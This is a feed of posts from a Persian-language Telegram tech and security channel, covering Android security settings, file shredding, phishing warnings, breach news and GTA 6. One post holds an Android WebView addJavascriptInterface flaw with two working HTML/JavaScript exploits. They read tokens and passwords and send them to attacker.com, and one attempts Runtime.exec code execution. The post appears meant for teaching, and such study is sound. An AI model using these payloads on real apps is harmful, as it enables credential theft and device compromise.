تکنولوژی،خبری،هوش مصنوعی،
166K subscribers
4.11K photos
4.64K videos
683 files
4.36K links


خبری،تکنولوژی،هوش مصنوعی،اینترنت آزاد✅️
🔹فعالیت کانال به دور از هرگونه دسته بندی سیاسی
میباشد.
تبلیغ برای VPN نداریم👋
Download Telegram
🤯 یه دکمه تو اندروید هست که میتونه امنیت گوشی‌تو خیلی بالاتر ببره!

🌀اسمش Advanced Protection ـه؛ و وقتی روشنش کنی، اندروید مجموعه‌ای از قفل‌های امنیتی جدی رو فعال میکنه. روی دستگاه‌های پشتیبانی‌شده، این حالت میتونه جلوی نصب اپ‌های ناشناس، بعضی حمله‌های USB، وصل شدن به شبکه‌های 2G و حتی سرقت گوشی رو سخت‌تر کنه.

▪️از همه مهم‌تر، داخل همین بخش ابزارهایی مثل Theft Detection Lock و Offline Device Lock هم هستن؛ یعنی اگر گوشی از دستت کشیده بشه یا برای مدتی آفلاین بشه، خودش قفل میشه.

برای فعال‌کردنش هم معمولاً باید بری به :

Settings → Security & Privacy → Advanced Protection

یا :

Google → All services → Advanced Protection.

+ اگر دنبال یه تنظیم واقعاً به‌دردبخور برای امنیت گوشی هستی، این یکی از همون گزینه‌هاست که ارزش فعال‌کردن داره.
@ITSecurityComputer
20🤣6👍4
رمزگشایی از هک چهار بانک/ فرزانی: این حمله تنها به خطوط ارتباطی بوده، نه خود منابع و مخازن /در جنگ به یکی از دیتاسنترهای بانکی حمله نظامی‌شد

حجت الله فرزانی، کارشناس حوزه بانکی در خبرآنلاین:
🔹چابکی بانک‌ها یعنی کدام بانک توانسته در حوزه امنیت اطلاعات و به طور خاص پوشش ریسک فناوری اطلاعات، پیشروتر عمل کند. آن بانکی که در این زمینه زودتر الزامات را رعایت کرده، با سرعت بیشتری فعالیت خود را آغاز کرده و آن بانک‌هایی که به هر دلیلی دچار تاخیر شدند، دیرتر موفق می‌شوند حمله را دفع کنند و فعالیت‌ها را به حالت عادی بازگردانند.
🔹این حمله نسبت به حملات پیشینی که در طول جنگ ۱۲ روزه و جنگ ۴۰ روزه تجربه کردیم، تخریب به مراتب کمتری را داشت. در این حمله فقط اتصال خدمات به دیتاسنترها مورد یورش دشمن قرار گرفت اما دیتاها و دیتاسنترها سر جای خودشان هستند. این حمله تنها به خطوط ارتباطی بوده، نه خود منابع و مخازن. با بازسازی خطوط ارتباطی، مشکل مرتفع می‌شود.
🔹ما هم در طول جنگ ۱۲ روزه و هم در طول جنگ رمضان حملات سایبری تخریبی بسیار بزرگتری را تجربه کردیم. دشمن تنها به حملات سایبری بزرگ هم اکتفا نکرد و یکی از دیتاسنترهای بانکی را به شکل فیزیکی مورد حمله قرار داد. درنتیجه سطح حمله اخیر در مقایسه با حملاتی که شبکه بانکی در یک سال گذشته تجربه کرده، به مراتب کوچکتر است.
@ITSecurityComputer
🤪216👍6🙏2
ظاهرا اینستا برا بعضی نت ها بدون وی پی ان میاره 😐
👎83👍545🤣2😐2
⁉️ توهمِ پاک کردن ؛ فایلی که Delete میکنی واقعاً حذف میشه؟

▪️فکر میکنی با زدن Delete یا حتی فرمت کردن، همه‌چی برای همیشه پاک شده؟ واقعیت اینه که تو اکثر مواقع، سیستم‌عامل فقط «آدرس» فایل رو حذف میکنه، نه خودِ فایل رو! تا وقتی اطلاعات جدید دقیقاً روی همون بخش نوشته نشه، فایل قبلی هنوز قابل بازیابیه 😬

▪️یعنی هرکسی با یه ابزار ریکاوری ساده میتونه عکس‌ها، ویدیوها یا فایل‌هایی که فکر می‌کردی نابود شدن رو برگردونه ، مخصوصاً قبل از فروش لپ‌تاپ، هارد یا گوشی.

میتونی از ابزار «File Shredder» استفاده کنی؛ برنامه‌هایی که بعد از حذف فایل، چند بار روی همون فضا داده تصادفی می‌نویسن تا چیزی برای برگردوندن باقی نمونه.

یکی از گزینه‌های رایگان و اوپن‌سورس تو ویندوز: BleachBit ، با گزینه Shred عملاً فایل رو پودر می‌کنه.

▪️برای دانلود ضربه بزنید

@ITSecurityComputer
👍2512
دام «یارانه معیشتی» و «سهام عدالت» برای خالی کردن حساب‌های بانکی

معاون اجرایی پلیس فتا:
🔹هرگونه پیام دریافتی حاوی لینک یا فایل‌های ناشناس از سرشماره‌های شخصی و پیام‌رسان‌ها با مضامینی همچون «ابلاغیه قضایی»، «بخشنامه دولت»، «سهام عدالت» و «به‌روزرسانی همراه بانک»، قطعا دامی‌برای آلوده‌سازی گوشی و سرقت موجودی حساب بانکی است.
🔹از شهروندان تقاضا می‌شود ضمن بی‌توجهی به این پیام‌های جعلی، از کلیک کردن بر روی هرگونه لینک مشکوک خودداری کنند. /ایسنا
@ITSecurityComputer
🤣286👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🔴شرکت راکستار به صورت رسمی از کاور آرت GTA 6 رو نمایی کرد.
+پیش فروش این بازی‌هم تقریباً از یک‌هفته دیگه (۴تیر | 25 June) شروع میشه.


@ITSecurityComputer
44🔥7👍4🤣3💔3🥴1
تکنیک مهندسی معکوس برای نوشتن پرامپت‌های بی‌نقص اگه عکسی تو اینترنت دیدید که خیلی خفن و حرفه‌ایه و دوست دارید بدونید چه پرامپتی پشتش بوده، از خود هوش مصنوعی کمک بگیرید
کافیه تصویر رو داخل ChatGPT یا Claude آپلود کنید و این دستور رو براش بفرستید:
"Analyze this image in extreme detail and describe every visual element, including composition, lighting, camera angle, lens characteristics, color grading, artistic style, materials, textures, mood, atmosphere, subject details, environment, depth of field, and rendering techniques. Then generate a complete AI image-generation prompt that can recreate a highly similar image."
هوش مصنوعی جزئیات پنهان تصویر رو استخراج می‌کنه و یک پرامپت حرفه‌ای در اختیارتون می‌ذاره تا بتونید تصاویر مشابه و حتی بهتر بسازید.
@ITSecurityComputer
30👍8🤣2
🕵️ یه سایت هست که میتونه تقریباً تمام اطلاعات عمومی یک وب‌سایت رو دربیاره!

🌀 فرض کن میخوای بدونی یه سایت روی چه سروری میزبانی میشه ، مال کدوم کشوره ، از چه CDN یا فایروالی استفاده میکنه ، کی ثبت شده یا حتی چه رکوردهای DNS داره...؟!

همه رو میتونی تو چند ثانیه با سایت‌های پایین ببینی!

🌐 dnsdumpster.com
🌐 securitytrails.com

🤯 جالب اینجاست که بعضی وقت‌ها از روی همین اطلاعات میشه فهمید:

▫️یه سایت واقعاً مال چه شرکتیه
▫️پشت Cloudflare قایم شده یا نه
▫️سرورهاش کجا قرار دارن
▫️قبلاً روی چه IPهایی بوده

@ITSecurityComputer
👍176🙏3
افشای ۱۲۴ میلیون پسورد و ایمیل؛ آیا اطلاعات شما هم در خطر است؟

🔹به‌تازگی سرویس مشهور هشدار نشت اطلاعات «Have I Been Pwned» یا به اختصار (HIBP)، مجموعه‌ای جدید شامل ۱۲۴ میلیون پسورد و بیش از ۵۶ میلیون آدرس ایمیل را به پایگاه داده خود اضافه کرده است.
🔹مدیر سرویس HIBP توضیح می‌دهد که این داده‌ها در واقع مجموعه‌ای از گزارش‌های ثبت‌شده توسط بدافزارهای سرقت‌کننده اطلاعات هستند. این برنامه‌های مخرب روی سیستم‌عامل ویندوز و سایر دستگاه‌ها پنهان می‌شوند و پسوردهای ذخیره‌شده، داده‌های مرورگر، کوکی‌ها و توکن‌های دسترسی را اسکن و سرقت می‌کنند.
🔹برای بررسی وضعیت امنیت اطلاعات خود، می‌توانید به سادگی به وب‌سایت HaveIBeenPwned.com مراجعه کنید. این پلتفرم اخیراً این اطلاعات جدید را به پایگاه داده خود اضافه کرده است و شما می‌توانید با جستجوی ایمیل خود، وضعیت آن را به سرعت بررسی کنید.
@ITSecurityComputer
23👍5🥰4
چرا اینترنت ایران پس از بازگشایی همچنان ناپایدار است؟

🔹با گذشت بیش از سه هفته از بازگشایی اینترنت بین‌الملل، کاربران همچنان با کندی، قطعی‌های مکرر و اختلال در دسترسی به سرویس‌های خارجی مواجه‌اند. بررسی‌های فنی نشان می‌دهد مجموعه‌ای از عوامل از جمله محدودیت در پروتکل TCP، اختلال در دیتاسنترها، مدیریت سخت‌گیرانه ترافیک و عدم استفاده از IPv۶، در ناپایداری اینترنت
نقش دارند. /سیتنا
@ITSecurityComputer
👍629👎2
امارات متحده عربی با تصویب قانونی جدید، حداقل سن مجاز برای فعالیت در شبکه‌های اجتماعی را به ۱۵ سال افزایش داد

- امارات نخستین کشور عربی است که چنین محدودیتی را برای کاربران فضای مجازی اعمال می‌کند.
- مصوبه جدید، کودکان زیر ۱۵ سال را از ایجاد یا استفاده از حساب‌های کاربری شخصی در شبکه‌های اجتماعی منع می‌کند.
- قانون مذکور همچنین دسترسی کاربران کم‌سن‌وسال به قابلیت‌های کامل پلتفرم‌های اجتماعی را محدود می‌سازد.

@ITSecurityComputer
👍6630👏10🤬2🤣2🤔1
🛑هکرها به سراغ پرونده‌های پژوهشی Novo Nordisk رفتند؛ اطلاعات مطالعات بالینی در حمله سایبری سرقت شد

شرکت داروسازی Novo Nordisk اعلام کرد در یک حمله سایبری، مهاجمان به بخشی از سامانه‌های داخلی این شرکت دسترسی پیدا کرده و اطلاعات مربوط به برخی مطالعات بالینی را کپی کرده‌اند.
به گفته شرکت، داده‌های سرقت‌شده شامل اطلاعات پژوهشی و برخی مشخصات شرکت‌کنندگان مطالعات بوده، اما نام و هویت مستقیم بیماران افشا نشده است. همچنین فعالیت‌های اصلی شرکت و تولید داروها تحت تأثیر این حادثه قرار نگرفته‌اند.
این رخداد بار دیگر نشان می‌دهد داده‌های پزشکی و پژوهشی به یکی از اهداف ارزشمند مهاجمان سایبری در سراسر جهان تبدیل شده‌اند.


@ITSecurityComputer
16👍6
This media is not supported in your browser
VIEW IN TELEGRAM
🔴اولین تصویر از شهر "وایس سیتی"، شهری که بازی Gta6 تو اون جریان داره.


@ITSecurityComputer
59😍10👎2🥴2👍1
مقایسه پشم ریزون مپ GTA 6 در مقابل 5

واقعا مپ Gta v در برابرش یه شوخیه!!

@ITSecurityComputer
👍115❤‍🔥19👎7🤯43🌚1😴1
خنده دار به نظر میاد ولی پرامپتش :
«این تصاویر مربوط به میوه‌هایی است که قصد خرید آن‌ها را دارم. لطفاً به‌صورت دقیق و حرفه‌ای آن‌ها را از نظر میزان رسیدگی، تازگی، شیرینی احتمالی، کیفیت ظاهری، لکه‌ها، له‌شدگی و نشانه‌های خراب بودن بررسی کن.
در نهایت:
بهترین گزینه برای خرید را مشخص کن
ترتیب کیفیت از بهترین تا ضعیف‌ترین را بنویس
دلیل انتخابت را خیلی کوتاه و واضح توضیح بده
اگر هیچ‌کدام مناسب نیستند، صادقانه بگو و دلیلش را توضیح بده
فرض کن یک کارشناس حرفه‌ای انتخاب میوه هستی و باید بهترین انتخاب را برای یک خرید واقعی انجام بدهی.»


@ITSecurityComputer
🍓45🤣30👍143
⭕️ در زیر یک تکه کد آسیب‌پذیر آورده شده است:
WebView webview = new WebView(this);
WebSettings webSettings = webview.getSettings();
webSettings.setJavaScriptEnabled(true);
webView.addJavascriptInterface(new WebAppInterface(this), "Android");
webView.loadUrl(getIntent().getStringExtra("url"));

کد اکسپلویت کامل
<!DOCTYPE html>
<html>
<head>
    <title>POC - WebView addJavascriptInterface</title>
</head>
<body>
    <h2> Exploiting addJavascriptInterface</h2>
    <div id="result"></div>
   
    <script>
        // مرحله 1: سرقت دیتا از متدهای exposed
        try {
            var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];
            for (var method of methods) {
                try {
                    var data = window.Android[method]();
                    if (data) {
                        document.getElementById('result').innerHTML +=
                            '<p>Stolen: ' + method + ' = ' + data + '</p>';
                        fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
                    }
                } catch(e) {}
            }
        } catch(e) {}
       
        // مرحله 2: RCE (فقط در صورتی که getContext در کلاس جاوا تعریف شده باشه)
        try {
            var context = window.Android.getContext();
            var classLoader = context.getClassLoader();
            var Runtime = classLoader.loadClass('java.lang.Runtime')
                .getMethod('getRuntime', null)
                .invoke(null, null);
            Runtime.exec(['su', '-c', 'id']);
            document.getElementById('result').innerHTML += '<p> RCE Successful!</p>';
        } catch(e) {
            document.getElementById('result').innerHTML +=
                '<p> RCE not possible (no chain method)</p>';
        }
    </script>
</body>
</html>

نسخه ساده‌تر (سرقت دیتا از متود های اکسپوزد)
<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<script>
// سرقت دیتای هر متدی که در کلاس جاوا وجود داره
var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];

for (var method of methods) {
try {
var data = window.Android[method]();
if (data) {
fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
alert('Stolen: ' + data);
}
} catch(e) {}
}
</script>
</body>
</html>

نکته: این POC فرض می‌کنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن.

نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!!

برای مطالعه بیشتر: Owasp MASTG

@ITSecurityComputer
👾214🤯3😱3
🔴 میدل ایست آی : از هوش مصنوعی گروک متعلق به ایلان ماسک برای مشخص کردن 2000 تارگت در حملات اخیر به ایران استفاده شده
البته مشخص نیست که انتخاب مدرسه ی میناب به عنوان هدف هم توسط هوش مصنوعی گراک انجام شده یا نه.

@ITSecurityComputer
🤬139🤣71😱10🫡52🤷‍♂2👍2🔥2🐳2💯1💔1
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از این ویدیو 📈📈📈

اسپویل : با این ترفند هرچی حرف بزنی رو تایپ میکنه، رایگان بدون نصب هیچی

🪽 Fachlich
🍃 @ITSecurityComputer
🤣797👍5
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از اینکه مشخص میشه اصلا برای تبدیل صدا به متن نیازی به گوشی نیست : 📉📉🫪🫨

🪽 Fachlich
🍃 @ITSecurityComputer
🤣778